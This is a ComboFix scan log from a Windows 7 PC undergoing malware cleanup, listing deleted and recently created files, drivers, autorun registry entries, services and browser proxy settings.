Microsoft Windows 7 Ultimate   6.1.7600.0.932.81.1033.18.3293.1635 [GMT 5.75:45]
Running from: e:\myfiles and backup\svchost remover\ComboFix.exe
AV: AVG AntiVirus Free Edition 2014 *Disabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
SP: AVG AntiVirus Free Edition 2014 *Disabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Created a new restore point
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
---- Previous Run -------
.
c:\program files\Internet Explorer\dmlconf.dat
c:\program files\TrustMediaViewerV1
c:\users\User\AppData\Local\assembly\tmp
c:\windows\system32\Cache
c:\windows\system32\Cache\03241c939db144db.fb
c:\windows\system32\Cache\03241c939db144db__exp__1407130625
c:\windows\system32\config\systemprofile\AppData\Local\assembly\tmp
.
.
(((((((((((((((((((((((((((((((((((((((   Drivers/Services   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
-------\Legacy_NETHFDRV
.
.
(((((((((((((((((((((((((   Files Created from 2014-07-05 to 2014-08-05  )))))))))))))))))))))))))))))))
.
.
2014-08-05 05:54 . 2014-08-05 05:54 -------- d-----w- c:\users\postgres\AppData\Local\temp
2014-08-05 05:54 . 2014-08-05 05:54 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-08-05 05:54 . 2014-08-05 05:54 -------- d-----w- c:\users\Classic .NET AppPool\AppData\Local\temp
2014-08-05 05:54 . 2014-08-05 05:54 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Local\temp
2014-08-05 04:21 . 2014-08-05 04:21 -------- d-----w- c:\program files\VS Revo Group
2014-08-04 09:52 . 2014-08-04 09:52 -------- d-----w- c:\program files\TortoiseGit
2014-08-04 04:44 . 2014-08-04 08:05 -------- d-----w- C:\FRST
2014-08-03 05:43 . 2014-08-03 05:43 -------- d-----w- c:\windows\system32\%LOCALAPPDATA%
2014-08-03 05:39 . 2014-08-03 06:00 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Roaming\FileZilla
2014-08-03 05:37 . 2014-08-03 05:37 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Local\Skype
2014-08-03 05:37 . 2014-08-03 06:37 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Roaming\Skype
2014-08-03 05:37 . 2014-08-03 05:37 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Local\AVG Web TuneUp
2014-08-03 05:37 . 2014-08-05 05:09 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Local\assembly
2014-08-03 05:36 . 2014-08-03 05:36 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Local\TechSmith
2014-08-03 05:36 . 2014-08-03 07:03 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Local\TSVNCache
2014-08-01 12:12 . 2014-08-04 11:59 -------- d-----w- c:\users\User\AppData\Local\AVG Web TuneUp
2014-08-01 12:12 . 2014-08-03 05:33 -------- d-----w- c:\programdata\AVG Security Toolbar
2014-08-01 12:12 . 2014-08-01 12:11 42784 ----a-w- c:\windows\system32\drivers\avgtpx86.sys
2014-08-01 12:12 . 2014-08-01 12:12 -------- d-----w- c:\programdata\AVG Secure Search
2014-08-01 12:12 . 2014-08-01 12:12 -------- d-----w- c:\program files\Common Files\AVG Secure Search
2014-08-01 12:12 . 2014-08-01 12:12 -------- d-----w- c:\programdata\AVG Web TuneUp
2014-08-01 12:12 . 2014-08-01 12:12 -------- d-----w- c:\program files\AVG Web TuneUp
2014-07-31 11:51 . 2014-07-31 11:51 -------- d-----w- c:\program files\Tweaking.com
2014-07-31 07:25 . 2014-07-31 07:25 -------- d-----w- c:\users\User\AppData\Roaming\AVG2014
2014-07-31 07:22 . 2014-07-31 07:22 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Roaming\AVG2014
2014-07-31 07:21 . 2014-07-31 07:21 -------- d-----w- c:\users\User\AppData\Roaming\TuneUp Software
2014-07-31 07:19 . 2014-07-31 07:41 -------- d-----w- c:\programdata\AVG2014
2014-07-31 07:19 . 2014-08-01 12:14 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Local\Avg2014
2014-07-31 07:15 . 2014-07-31 07:41 -------- d-----w- c:\users\User\AppData\Local\Avg2014
2014-07-31 07:15 . 2014-07-31 07:15 -------- d-----w- c:\users\User\AppData\Local\MFAData
2014-07-31 05:45 . 2014-07-13 22:27 8217224 ------w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{8BBDE6C6-BD2C-4DE0-95CD-FD28042B54C9}\mpengine.dll
2014-07-30 10:16 . 2014-07-31 04:33 -------- d-----w- C:\AdwCleaner
2014-07-30 09:26 . 2014-07-30 09:26 -------- d-----w- C:\TDSSKiller_Quarantine
2014-07-30 09:18 . 2014-07-31 05:53 -------- d-----w- c:\programdata\AVAST Software
2014-07-30 03:35 . 2014-07-30 03:35 687 ----a-w- C:\awhE80D.tmp
2014-07-29 11:05 . 2014-07-29 11:05 687 ----a-w- C:\awhF508.tmp
2014-07-29 05:06 . 2014-07-29 05:06 687 ----a-w- C:\awhDFF2.tmp
2014-07-29 03:30 . 2014-07-29 03:30 687 ----a-w- C:\awhE5AC.tmp
2014-07-28 09:24 . 2014-07-28 09:24 687 ----a-w- C:\awhE446.tmp
2014-07-28 09:04 . 2014-07-28 09:04 687 ----a-w- C:\awhE040.tmp
2014-07-28 08:27 . 2014-07-28 08:27 687 ----a-w- C:\awh4D83.tmp
2014-07-28 05:26 . 2014-07-28 05:26 -------- d-----w- c:\program files\CCleaner
2014-07-28 03:38 . 2014-07-28 03:38 687 ----a-w- C:\awhE9F0.tmp
2014-07-25 12:13 . 2014-07-25 12:13 687 ----a-w- C:\awhF150.tmp
2014-07-25 11:01 . 2014-07-28 04:24 -------- d-----w- c:\users\User\AppData\Local\1682
2014-07-25 10:49 . 2014-07-28 09:16 -------- d-----w- c:\program files\Bulk Rename Utility
2014-07-25 03:31 . 2014-07-25 03:31 687 ----a-w- C:\awhE954.tmp
2014-07-24 05:40 . 2014-08-01 07:55 -------- d-----w- c:\program files\VisualSVN Server
2014-07-24 03:28 . 2014-07-24 03:28 687 ----a-w- C:\awhDC4A.tmp
2014-07-23 03:40 . 2014-07-23 03:40 687 ----a-w- C:\awhDDEF.tmp
2014-07-22 10:08 . 2014-07-22 13:09 -------- d-----w- c:\users\User\AppData\Roaming\DBDesigner4
2014-07-22 09:37 . 2014-07-22 09:37 687 ----a-w- C:\awhE1D6.tmp
2014-07-22 03:39 . 2014-07-22 03:39 687 ----a-w- C:\awhE465.tmp
2014-07-21 03:36 . 2014-07-21 03:36 687 ----a-w- C:\awhDBEC.tmp
2014-07-18 03:31 . 2014-07-18 03:31 687 ----a-w- C:\awhDCA8.tmp
2014-07-16 03:32 . 2014-07-16 03:32 687 ----a-w- C:\awhD8A2.tmp
2014-07-15 03:31 . 2014-07-15 03:31 687 ----a-w- C:\awhD9F9.tmp
2014-07-14 03:41 . 2014-07-14 03:41 687 ----a-w- C:\awhD9CA.tmp
2014-07-11 03:23 . 2014-07-11 03:23 687 ----a-w- C:\awhDCF6.tmp
2014-07-10 04:24 . 2014-07-10 04:24 687 ----a-w- C:\awhDA18.tmp
2014-07-10 03:30 . 2014-07-10 03:30 687 ----a-w- C:\awhDC88.tmp
2014-07-09 03:29 . 2014-07-09 03:29 687 ----a-w- C:\awhDCD6.tmp
2014-07-08 03:37 . 2014-07-08 03:37 687 ----a-w- C:\awhE0EC.tmp
2014-07-07 03:40 . 2014-07-07 03:40 687 ----a-w- C:\awhD74B.tmp
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-07-30 09:21 . 2014-07-30 09:21 776976 ----a-w- c:\windows\system32\drivers\aswsnx.sys.1406712158422
2014-07-30 09:21 . 2014-07-30 09:21 411552 ----a-w- c:\windows\system32\drivers\aswsp.sys.1406712158422
2014-07-23 05:07 . 2011-06-06 04:05 231584 ------w- c:\windows\system32\MpSigStub.exe
2014-07-09 06:51 . 2012-04-08 03:41 699056 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-07-09 06:51 . 2011-06-06 04:12 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-07-04 03:40 . 2014-07-04 03:40 687 ----a-w- C:\awhE12A.tmp
2014-07-03 08:53 . 2014-07-03 08:53 0 ----a-w- c:\users\User\.mongorc.js
2014-07-03 08:36 . 2014-07-03 08:36 687 ----a-w- C:\awhE407.tmp
2014-07-03 03:40 . 2014-07-03 03:40 687 ----a-w- C:\awhDA09.tmp
2014-07-02 04:48 . 2014-07-02 04:48 687 ----a-w- C:\awhE233.tmp
2014-07-01 03:53 . 2014-07-01 03:53 687 ----a-w- C:\awhDC1C.tmp
2014-06-30 08:19 . 2014-06-30 08:19 687 ----a-w- C:\awhDC1B.tmp
2014-06-30 03:34 . 2014-06-30 03:34 687 ----a-w- C:\awhEC80.tmp
2014-06-27 13:39 . 2014-06-27 13:39 687 ----a-w- C:\awhEE06.tmp
2014-06-27 03:39 . 2014-06-27 03:39 687 ----a-w- C:\awhE4E2.tmp
2014-06-26 10:17 . 2014-06-26 10:17 687 ----a-w- C:\awh1E87.tmp
2014-06-26 03:31 . 2014-06-26 03:31 687 ----a-w- C:\awhE926.tmp
2014-06-25 03:40 . 2014-06-25 03:40 687 ----a-w- C:\awhE0CC.tmp
2014-06-24 13:22 . 2014-06-24 13:22 687 ----a-w- C:\awhF72A.tmp
2014-06-24 03:33 . 2014-06-24 03:33 687 ----a-w- C:\awhE54F.tmp
2014-06-23 04:15 . 2014-06-23 04:15 687 ----a-w- C:\awhEB76.tmp
2014-06-17 10:37 . 2014-06-17 10:37 188696 ----a-w- c:\windows\system32\drivers\avgldx86.sys
2014-06-17 10:36 . 2014-06-17 10:36 197400 ----a-w- c:\windows\system32\drivers\avgtdix.sys
2014-06-17 10:33 . 2014-06-17 10:33 241944 ----a-w- c:\windows\system32\drivers\avglogx.sys
2014-06-17 10:32 . 2014-06-17 10:32 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys
2014-06-17 10:21 . 2014-06-17 10:21 199960 ----a-w- c:\windows\system32\drivers\avgidsdriverx.sys
2014-06-17 10:21 . 2014-06-17 10:21 121624 ----a-w- c:\windows\system32\drivers\avgdiskx.sys
2014-06-17 10:21 . 2014-06-17 10:21 98584 ----a-w- c:\windows\system32\drivers\avgmfx86.sys
2014-06-17 10:21 . 2014-06-17 10:21 27416 ----a-w- c:\windows\system32\drivers\avgrkx86.sys
2014-06-17 10:21 . 2014-06-17 10:21 21272 ----a-w- c:\windows\system32\drivers\avgidsshimx.sys
.
.
------- Sigcheck -------
Note: Unsigned files aren't necessarily malware.
.
[-] 2012-02-05 . 7BD7F45FF37FA0669CD32CA0EF46E22C . 811520 . . [6.1.7600.16385] . . c:\windows\System32\user32.dll
[7] 2010-11-20 . F1DD3ACAEE5E6B4BBC69BC6DF75CEF66 . 811520 . . [6.1.7601.17514] . . c:\windows\SoftwareDistribution\Download\18e2c83e42cc8f0cc17b5dbfaf982690\x86_microsoft-windows-user32_31bf3856ad364e35_6.1.7601.17514_none_cf3fd62ccb9e983d\user32.dll
[7] 2009-07-14 . 34B7E222E81FAFA885F0C5F2CFA56861 . 811520 . . [6.1.7600.16385] . . c:\windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.1.7600.16385_none_cd0ec264ceb014a3\user32.dll
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt1"]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ------w- c:\users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt2"]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ------w- c:\users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt3"]
@="{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ------w- c:\users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt4"]
@="{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ------w- c:\users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt5"]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ------w- c:\users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt6"]
@="{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ------w- c:\users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt7"]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ------w- c:\users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt8"]
@="{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ------w- c:\users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1TortoiseNormal]
@="{C5994560-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994560-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\2TortoiseModified]
@="{C5994561-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994561-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\3TortoiseConflict]
@="{C5994562-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994562-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\4TortoiseLocked]
@="{C5994563-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994563-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\5TortoiseReadOnly]
@="{C5994564-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994564-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\6TortoiseDeleted]
@="{C5994565-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994565-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\7TortoiseAdded]
@="{C5994566-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994566-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\8TortoiseIgnored]
@="{C5994567-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994567-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\9TortoiseUnversioned]
@="{C5994568-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994568-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-07-14 1173504]
"Free Download Manager"="c:\program files\Free Download Manager\fdm.exe" [2014-07-30 6875136]
"WordWeb"="c:\program files\WordWeb\wweb32.exe" [2013-05-16 77056]
"Skype"="c:\program files\Skype\Phone\Skype.exe" [2014-05-08 21445248]
"ownCloud"="c:\program files\ownCloud\owncloud.exe" [2014-06-26 17381826]
"RESTART_STICKY_NOTES"="c:\windows\System32\StikyNot.exe" [2009-07-14 354304]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"GrooveMonitor"="c:\program files\Microsoft Office\Office12\GrooveMonitor.exe" [2006-10-27 31016]
"AdobeCS5ServiceManager"="c:\program files\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" [2010-02-21 406992]
"SwitchBoard"="c:\program files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe" [2010-02-19 517096]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-04-23 43848]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2009-10-02 35696]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2009-09-04 935288]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2009-09-14 141848]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2009-09-14 173592]
"Persistence"="c:\windows\system32\igfxpers.exe" [2009-09-14 150552]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-17 252296]
"googletalk"="c:\program files\Google\Google Talk\googletalk.exe" [2014-07-30 3739648]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-05-26 152392]
"AVG_UI"="c:\program files\AVG\AVG2014\avgui.exe" [2014-06-17 5179408]
"vProt"="c:\program files\AVG Web TuneUp\vprot.exe" [2014-08-01 2575384]
.
c:\users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Dropbox.lnk - c:\users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe /systemstartup [2014-7-22 35464216]
EvernoteClipper.lnk - c:\program files\Evernote\Evernote\EvernoteClipper.exe [2014-7-21 1109344]
OneNote 2007 Screen Clipper and Launcher.lnk - c:\program files\Microsoft Office\Office12\ONENOTEM.EXE /tsr [2006-10-27 98632]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Snagit 11.lnk - c:\program files\TechSmith\Snagit 11\Snagit32.exe [2012-9-7 9519544]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe Reader Speed Launcher]
2009-10-02 22:23 35696 ------w- c:\program files\Adobe\Reader 9.0\Reader\reader_sl.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AdobeAAMUpdater-1.0]
2010-03-05 21:59 500208 ------w- c:\program files\Common Files\Adobe\OOBE\PDApp\UWA\updaterstartuputility.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AdobeBridge]
2010-03-08 22:43 11989960 ------w- c:\program files\Adobe\Adobe Bridge CS5\Bridge.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2014-05-26 13:27 152392 ------w- c:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Messenger (Yahoo!)]
2009-11-10 23:39 5244216 ------w- c:\program files\Yahoo!\Messenger\YahooMessenger.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NeroFilterCheck]
2001-07-09 18:50 155648 ----a-w- c:\windows\System32\NeroCheck.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2014-07-31 07:41 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
.
R2 AVGIDSAgent;AVGIDSAgent;c:\program files\AVG\AVG2014\avgidsagent.exe [2014-06-27 3241488]
R2 MongoDB;Mongo DB;d:\wamp\bin\mongodb\mongodb-win32-i386-2.4.5\bin\mongod.exe [2014-07-31 11314688]
R2 SkypeUpdate;Skype Updater;c:\program files\Skype\Updater\Updater.exe [2013-10-23 172192]
R3 L1C;NDIS Miniport Driver for Atheros AR8131/AR8132 PCI-E Ethernet Controller (NDIS 6.20);c:\windows\system32\DRIVERS\L1C62x86.sys [2009-07-13 50688]
R3 McComponentHostService;McAfee Security Scan Component Host Service;c:\program files\McAfee Security Scan\3.8.150\McCHSvc.exe [x]
R3 SwitchBoard;SwitchBoard;c:\program files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [2010-02-19 517096]
R3 Te.Service;Te.Service;c:\program files\Windows Kits\8.0\Testing\Runtimes\TAEF\Wex.Services.exe [2014-07-31 94208]
R3 vrepocfgsvc;VisualSVN Repository Configurator Service;c:\program files\VisualSVN Server\bin\vrepocfgsvc.exe [2014-06-10 122000]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2011-06-06 1343400]
R3 WMSVC;Web Management Service;c:\windows\system32\inetsrv\wmsvc.exe [2009-07-14 9728]
R4 MSSQLServerADHelper100;SQL Active Directory Helper Service;c:\program files\Microsoft SQL Server\100\Shared\SQLADHLP.EXE [2008-07-10 47128]
R4 RsFx0102;RsFx0102 Driver;c:\windows\system32\DRIVERS\RsFx0102.sys [2008-07-09 242712]
S0 AVGIDSHX;AVGIDSHX;c:\windows\system32\DRIVERS\avgidshx.sys [2014-06-17 147736]
S0 Avglogx;AVG Logging Driver;c:\windows\system32\DRIVERS\avglogx.sys [2014-06-17 241944]
S0 Avgrkx86;AVG Anti-Rootkit Driver;c:\windows\system32\DRIVERS\avgrkx86.sys [2014-06-17 27416]
S1 Avgdiskx;AVG Disk Driver;c:\windows\system32\DRIVERS\avgdiskx.sys [2014-06-17 121624]
S1 AVGIDSDriver;AVGIDSDriver;c:\windows\system32\DRIVERS\avgidsdriverx.sys [2014-06-17 199960]
S1 AVGIDSShim;AVGIDSShim;c:\windows\system32\DRIVERS\avgidsshimx.sys [2014-06-17 21272]
S1 Avgldx86;AVG AVI Loader Driver;c:\windows\system32\DRIVERS\avgldx86.sys [2014-06-17 188696]
S1 Avgtdix;AVG TDI Driver;c:\windows\system32\DRIVERS\avgtdix.sys [2014-06-17 197400]
S1 avgtp;avgtp;c:\windows\system32\drivers\avgtpx86.sys [2014-08-01 42784]
S2 avgwd;AVG WatchDog;c:\program files\AVG\AVG2014\avgwdsvc.exe [2014-06-17 289328]
S2 c2cautoupdatesvc;Skype Click to Call Updater;c:\program files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [2014-07-14 1390176]
S2 c2cpnrsvc;Skype Click to Call PNR Service;c:\program files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [2014-07-14 1767520]
S2 ftpsvc;Microsoft FTP Service;c:\windows\system32\svchost.exe [2009-07-14 20992]
S2 postgresql-9.2;postgresql-9.2 - PostgreSQL Server 9.2;C:/Program Files/PostgreSQL/9.2/bin/pg_ctl.exe runservice -N postgresql-9.2 -D C:/Program Files/PostgreSQL/9.2/data -w [x]
S2 TeamViewer9;TeamViewer 9;c:\program files\TeamViewer\Version9\TeamViewer_Service.exe [2014-07-02 5037888]
S2 VisualSVNServer;VisualSVN Server;c:\program files\VisualSVN Server\bin\VisualSVNServer.exe [2014-06-10 24208]
S2 vToolbarUpdater3.1.0;vToolbarUpdater3.1.0;c:\program files\Common Files\AVG Secure Search\vToolbarUpdater\3.1.0\ToolbarUpdater.exe [2014-08-01 1814040]
S3 MSSQLFDLauncher;SQL Full-text Filter Daemon Launcher (MSSQLSERVER);c:\program files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe [2008-07-09 31256]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt86win7.sys [2010-06-23 275048]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
ftpsvc REG_MULTI_SZ   ftpsvc
iissvcs REG_MULTI_SZ   w3svc was
apphost REG_MULTI_SZ   apphostsvc
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-07-21 09:24 1104200 ------w- c:\program files\Google\Chrome\Application\36.0.1985.125\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-08-05 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-08 06:51]
.
2014-08-05 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-10-08 04:42]
.
2014-08-05 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-10-08 04:42]
.
.
------- Supplementary Scan -------
.
uInternet Settings,ProxyOverride = *.local
uInternet Settings,ProxyServer = 133.242.131.152:443
IE: Clip Image - c:\program files\Evernote\Evernote\\EvernoteIERes\Clip.html?clipAction=4
IE: Clip selection - c:\program files\Evernote\Evernote\\EvernoteIERes\Clip.html?clipAction=3
IE: Clip this page - c:\program files\Evernote\Evernote\\EvernoteIERes\Clip.html?clipAction=1
IE: Clip URL - c:\program files\Evernote\Evernote\\EvernoteIERes\Clip.html?clipAction=0
IE: Download all with Free Download Manager - file://c:\program files\Free Download Manager\dlall.htm
IE: Download selected with Free Download Manager - file://c:\program files\Free Download Manager\dlselected.htm
IE: Download video with Free Download Manager - file://c:\program files\Free Download Manager\dlfvideo.htm
IE: Download with Free Download Manager - file://c:\program files\Free Download Manager\dllink.htm
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\Office12\EXCEL.EXE/3000
IE: New Note - c:\program files\Evernote\Evernote\\EvernoteIERes\NewNote.html
TCP: DhcpNameServer = 192.168.1.1
TCP: Interfaces\{63FC3279-79DA-467C-9214-685FFAC4C36B}: NameServer = 192.168.1.1
TCP: Interfaces\{DD3FC8E9-6A2B-4F35-A1CF-48A32145169C}: DhcpNameServer = 192.168.1.1
Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - c:\program files\Common Files\AVG Secure Search\ViProtocolInstaller\3.1.0\ViProtocol.dll
FF - ProfilePath - c:\users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\
FF - prefs.js: network.proxy.http - 125.195.133.102
FF - prefs.js: network.proxy.http_port - 808
